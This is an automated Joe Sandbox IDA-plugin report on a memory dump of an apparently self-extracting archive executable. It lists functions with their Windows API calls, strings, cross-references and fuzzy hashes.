Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00370D84
|@9, xrefs: 00370A77
P>9, xrefs: 00370997
DXGIDebug.dll, xrefs: 003708FC, 00370C5E
>9, xrefs: 003709C7
dwmapi.dll, xrefs: 00370927, 00370D0D
H?9, xrefs: 003709F3
8>9, xrefs: 0037098F
(=9, xrefs: 0037092F
`@9, xrefs: 00370A6C
|<9, xrefs: 00370B9E, 00370BA2
,@9, xrefs: 00370A56
H@9, xrefs: 00370A61
uxtheme.dll, xrefs: 00370D17
@9, xrefs: 00370AAE
kernel32, xrefs: 00370873
T=9, xrefs: 0037093F
SetDllDirectoryW, xrefs: 00370888
|?9, xrefs: 00370A09
?9, xrefs: 00370A35
A9, xrefs: 00370B1C
SetDefaultDllDirectories, xrefs: 003708B9
0?9, xrefs: 003709E8
dA9, xrefs: 00370AE5
0A9, xrefs: 00370ACF
D=9, xrefs: 00370CB9, 00370CC9

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
String ID: (=9$,<9$,@9$0?9$0A9$4B9$8>9$D=9$DXGIDebug.dll$H?9$H@9$HA9$P>9$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=9$`@9$d?9$dA9$dwmapi.dll$h=9$h>9$kernel32$uxtheme.dll$|<9$|?9$|@9$<9$>9$?9$@9$A9
API String ID: 1207345701-1829638217
Opcode ID: 409386703e4385607133f10098e7858fd52d9e3ff30057dd48582f30b1198311
Instruction ID: 4b3e199dabf1939c3b8ab164d5252d61f6f2933bb489d2f057b9f6564169ab09
Opcode Fuzzy Hash: 409386703e4385607133f10098e7858fd52d9e3ff30057dd48582f30b1198311
Instruction Fuzzy Hash: 95D180F5408385EBDB339F50C849A9FBBECBB85708F50491DF1899A250C7B58A49CB62

Function 0037C73F Relevance: 51.2, APIs: 23, Strings: 6, Instructions: 428
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0037C744

Part of subcall function 0037B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0037B3FB

Part of subcall function 0037AF98: _wcschr.LIBVCRUNTIME ref: 0037B033

_wcslen.LIBCMT ref: 0037CA0A
_wcslen.LIBCMT ref: 0037CA13
SetWindowTextW.USER32(?,?), ref: 0037CA71
_wcslen.LIBCMT ref: 0037CAB3
_wcsrchr.LIBVCRUNTIME ref: 0037CBFB
GetDlgItem.USER32(?,00000066), ref: 0037CC36
SetWindowTextW.USER32(00000000,?), ref: 0037CC46
SendMessageW.USER32(00000000,00000143,00000000,003AA472), ref: 0037CC54
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0037CC7F

Strings

%s.%d.tmp, xrefs: 0037C940
7, xrefs: 0037CB24
ProgramFilesDir, xrefs: 0037CB45
Software\Microsoft\Windows\CurrentVersion, xrefs: 0037CB1A
<7, xrefs: 0037C909
<br>, xrefs: 0037C9D4

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
String ID: %s.%d.tmp$<br>$<7$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$7
API String ID: 986293930-2680291851
Opcode ID: abecaf949f1915793284111f605d35125387cfa60225da1e870a93861d4f2ef3
Instruction ID: c8bae630bd7cc2a5b7f97840332e7ff8bb714ff0143c9695bd5b3b8303ffc228
Opcode Fuzzy Hash: abecaf949f1915793284111f605d35125387cfa60225da1e870a93861d4f2ef3
Instruction Fuzzy Hash: 62E146B2900219AADF36EB60DC85DEE73BCAF05350F44C1A5F609E7140EB789E848F60

Function 0036DA67 Relevance: 26.9, APIs: 5, Strings: 10, Instructions: 663COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0036DA70
_wcschr.LIBVCRUNTIME ref: 0036DA91
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0036DAAC

Part of subcall function 0036C29A: _wcslen.LIBCMT ref: 0036C2A2

Part of subcall function 003705DA: _wcslen.LIBCMT ref: 003705E0

Part of subcall function 00371B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0036BAE9,00000000,?,?,?,00010474), ref: 00371BA0

_wcslen.LIBCMT ref: 0036DDE9
__fprintf_l.LIBCMT ref: 0036DF1C

Strings

,, xrefs: 0036DF57
R, xrefs: 0036DC0C
99, xrefs: 0036DDD0
, xrefs: 0036DD6C
*messages***, xrefs: 0036DBC1
$%s:, xrefs: 0036DEFF
a, xrefs: 0036DC16
*messages***, xrefs: 0036DBFA
@%s:, xrefs: 0036DF06, 0036DF12
RTL, xrefs: 0036DEDE

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$99
API String ID: 557298264-3818710046
Opcode ID: 66f0892aa895b7508efb99376651a19121bb403ea818b294f154883563c23db6
Instruction ID: 740e63650c5e68a25e7510583f216b97cfab7d427b468bd1972a575eb395a858
Opcode Fuzzy Hash: 66f0892aa895b7508efb99376651a19121bb403ea818b294f154883563c23db6
Instruction Fuzzy Hash: 1032F376A00218DBCF26EF68C845BEE77A9FF05700F41855AF9059B289E7B1DD88CB50

Function 0037D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0037B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0037B579
Part of subcall function 0037B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0037B58A
Part of subcall function 0037B568: IsDialogMessageW.USER32(00010474,?), ref: 0037B59E
Part of subcall function 0037B568: TranslateMessage.USER32(?), ref: 0037B5AC
Part of subcall function 0037B568: DispatchMessageW.USER32(?), ref: 0037B5B6

GetDlgItem.USER32(00000068,003BFCB8), ref: 0037D4E8
ShowWindow.USER32(00000000,00000005,?,?,?,0037AF07,00000001,?,?,0037B7B9,0039506C,003BFCB8,003BFCB8,00001000,00000000,00000000), ref: 0037D510
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0037D51B
SendMessageW.USER32(00000000,000000C2,00000000,003935F4), ref: 0037D529
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0037D53F
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0037D559
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0037D59D
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0037D5AB
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0037D5BA
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0037D5E1
SendMessageW.USER32(00000000,000000C2,00000000,003943F4), ref: 0037D5F0

Strings

\, xrefs: 0037D549

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: be7ed52ee0a1e230a2e5af45edaa593d9b73ebeb37fae5b24ab640235166ddb4
Instruction ID: 099adf2ea29e5a0841600d0b5a2fe3a2e8cb6dfdb54ec42dc0578a78322406b9
Opcode Fuzzy Hash: be7ed52ee0a1e230a2e5af45edaa593d9b73ebeb37fae5b24ab640235166ddb4
Instruction Fuzzy Hash: 1031D172145352AFE312EF20DC4AFAB7FACEB8A758F008518F552D6190DB64AA048776

Function 0037D78F Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 0037D7AE
ShellExecuteExW.SHELL32(?), ref: 0037D8DE
ShowWindow.USER32(?,00000000), ref: 0037D91D
GetExitCodeProcess.KERNEL32(?,?), ref: 0037D959
CloseHandle.KERNEL32(?), ref: 0037D97F
ShowWindow.USER32(?,00000001), ref: 0037D9E1

Strings

h7, xrefs: 0037D92E
PDu<7, xrefs: 0037D8DE
r7, xrefs: 0037D911
.inf, xrefs: 0037D89A
.exe, xrefs: 0037D989

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
String ID: .exe$.inf$PDu<7$h7$r7
API String ID: 36480843-3959991556
Opcode ID: 21af76e1ed4af309871876f975407c21d9e049cd621d444558af0a93592ec35c
Instruction ID: 2a53ffed54ae0b84d71a8fb339aa674a5297f230fa86ac6a62655841f189c8c6
Opcode Fuzzy Hash: 21af76e1ed4af309871876f975407c21d9e049cd621d444558af0a93592ec35c
Instruction Fuzzy Hash: 8951D471104380AADB339B24D844BABBBF8AF86744F05841EF6C997291E7799984CB52

Function 0038A95B Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00385695,00385695,?,?,?,0038ABAC,00000001,00000001,2DE85006), ref: 0038A9B5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0038ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0038AA3B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0038AB35
__freea.LIBCMT ref: 0038AB42

Part of subcall function 00388E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0038CA2C,00000000,?,00386CBE,?,00000008,?,003891E0,?,?,?), ref: 00388E38

__freea.LIBCMT ref: 0038AB4B
__freea.LIBCMT ref: 0038AB70

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 8e06e154b50b4a56303e5e32c9d4fef58062314c8b22935606304d214a1cbdc0
Instruction ID: 80b8e0f9efdbba632a690e0be620f6973ff0bc4b403824fe2c8b463968dff077
Opcode Fuzzy Hash: 8e06e154b50b4a56303e5e32c9d4fef58062314c8b22935606304d214a1cbdc0
Instruction Fuzzy Hash: 2051E372600B16ABFB27AF64CC41EBBB7AAEB40710F1646AAFD04DA140DB34DD50D791

Function 00383B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,00383C35,?,?,003C2088,00000000,?,00383D60,00000004,InitializeCriticalSectionEx,00396394,InitializeCriticalSectionEx,00000000), ref: 00383C03

Strings

api-ms-, xrefs: 00383BC3

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 88115c2b6805f261531fcdb4143133ce2dee6e29b937cf4f8d7655c012f98021
Instruction ID: 3d1df055f88694fcf842c7aee3e450bad10a4096b04ce67b0273ae878f51e7ba
Opcode Fuzzy Hash: 88115c2b6805f261531fcdb4143133ce2dee6e29b937cf4f8d7655c012f98021
Instruction Fuzzy Hash: 5511CAB5A46321ABCF23AB689C41B9937689F01B70F1601A1E955FB390E771EF0087D1

Function 0037AC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0037081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00370836
Part of subcall function 0037081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0036F2D8,Crypt32.dll,00000000,0036F35C,?,?,0036F33E,?,?,?), ref: 00370858

OleInitialize.OLE32(00000000), ref: 0037AC2F
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0037AC66
SHGetMalloc.SHELL32(003A8438), ref: 0037AC70

Strings

riched20.dll, xrefs: 0037AC1E
3Ro, xrefs: 0037AC47

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll$3Ro
API String ID: 3498096277-3613677438
Opcode ID: 0d65707e230e1414827d31f594afdfcdbb7252473b9fa813cfea3c3390f4c12f
Instruction ID: db1a4af10e01ae9713f566a3de35d433c9a3e15537922988a7885103ea9e13db
Opcode Fuzzy Hash: 0d65707e230e1414827d31f594afdfcdbb7252473b9fa813cfea3c3390f4c12f
Instruction Fuzzy Hash: 3AF01DB5D00219ABCB11AFAAD849DEFFFFCEF85700F00815AE415E2241DBB856058FA1

Function 003698E0 Relevance: 7.6, APIs: 5, Instructions: 111
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00367760,?,00000005,?,00000011), ref: 0036995F
GetLastError.KERNEL32(?,?,00367760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0036996C
CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00367760,?,00000005,?), ref: 003699A2
GetLastError.KERNEL32(?,?,00367760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 003699AA
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00367760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 003699F9

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 116af476fbd6ca01f4b4c243ae4706c7c92dc991c2aa939ee4670df612c3f74b
Instruction ID: 73e231b0c3446b0a6055954c9f7d091fe51d259c73c9923745a36b87ac5a5ced
Opcode Fuzzy Hash: 116af476fbd6ca01f4b4c243ae4706c7c92dc991c2aa939ee4670df612c3f74b
Instruction Fuzzy Hash: BC315730544745AFE7329F20CC46BEABBDCBB05320F214B1EF9A1962C4D3B5A954CB90

Function 0037B568 Relevance: 7.5, APIs: 5, Instructions: 38
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0037B579
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0037B58A
IsDialogMessageW.USER32(00010474,?), ref: 0037B59E
TranslateMessage.USER32(?), ref: 0037B5AC
DispatchMessageW.USER32(?), ref: 0037B5B6

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 5b250027098fdd805917fa6484cd89a6ce52c8267cd3e281c05b3407d4fb288e
Instruction ID: 90fc68871fbf0b2a5b372c8a7bdc0d7b76696edab0c721987caa6ce8f69f7140
Opcode Fuzzy Hash: 5b250027098fdd805917fa6484cd89a6ce52c8267cd3e281c05b3407d4fb288e
Instruction Fuzzy Hash: 0EF09B72E01129BBCB21ABE6DC4CDEBBFBCEE05755B408415B51AD2050EB78E605CBB0

Function 0037ABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 0037ABC2
SHAutoComplete.SHLWAPI(?,00000010), ref: 0037ABF9

Part of subcall function 00371FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0036C116,00000000,.exe,?,?,00000800,?,?,?,00378E3C), ref: 00371FD1

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0037ABE9

Strings

EDIT, xrefs: 0037ABCD, 0037ABD8, 0037ABE5

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: f43f750cca0b0e55427dd0cbc9ea93283e7354014f95c02292c07e5190f386ae
Instruction ID: 32735b16bdbb3ae793bb6a85f9ac98d3705dbb24da5ef0637dcb757d9570b23f
Opcode Fuzzy Hash: f43f750cca0b0e55427dd0cbc9ea93283e7354014f95c02292c07e5190f386ae
Instruction Fuzzy Hash: A1F08233601628B6DB3257649C09F9F766C9B86B40F498011BA49E6180D764EA4186B6

Function 0037DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0037DBF4
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0037DC30

Strings

sfxcmd, xrefs: 0037DBEF
sfxpar, xrefs: 0037DC2B

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: f5fefc7dd55c0db0b1388f66141e8b82162b7eb66053886d08e84e68d795f2e1
Instruction ID: 29e16d11330bc9cb8d5e60565f51ee244c81ab2deff4864637d489bfb4a61f46
Opcode Fuzzy Hash: f5fefc7dd55c0db0b1388f66141e8b82162b7eb66053886d08e84e68d795f2e1
Instruction Fuzzy Hash: 49F0ECB2404225A7DF333F958C46BFA376CAF04785B044455FD8D99161E6B98980D7B0

Function 00369785 Relevance: 6.1, APIs: 4, Instructions: 56
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00369795
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 003697AD
GetLastError.KERNEL32 ref: 003697DF
GetLastError.KERNEL32 ref: 003697FE

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
